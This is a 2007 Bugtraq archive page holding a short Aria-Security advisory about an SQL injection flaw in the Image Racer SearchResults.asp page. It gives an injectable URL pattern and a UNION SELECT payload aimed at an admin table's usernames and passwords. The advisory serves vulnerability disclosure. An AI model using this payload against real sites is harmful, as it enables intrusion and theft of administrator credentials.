Bugtraq mailing list archives
[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.
From: Advisory () Aria-Security net
Date: 22 Jul 2007 23:42:46 -0000
__________________ Aria-Security Team __________________ Image Racer SearchResults.asp SQL Injection Vendor: http://www.junctionquest.com/Software.asp Example: http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0 Example : -1 'union select username,password from admin where [FIND IT YOUR SELF]=1 ------------------------------------------------ Credits: Aria-Security Team http://aria-security.net/ Personal Blog: http://outlaw.aria-security.info
Current thread:
- [Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln. Advisory (Jul 23)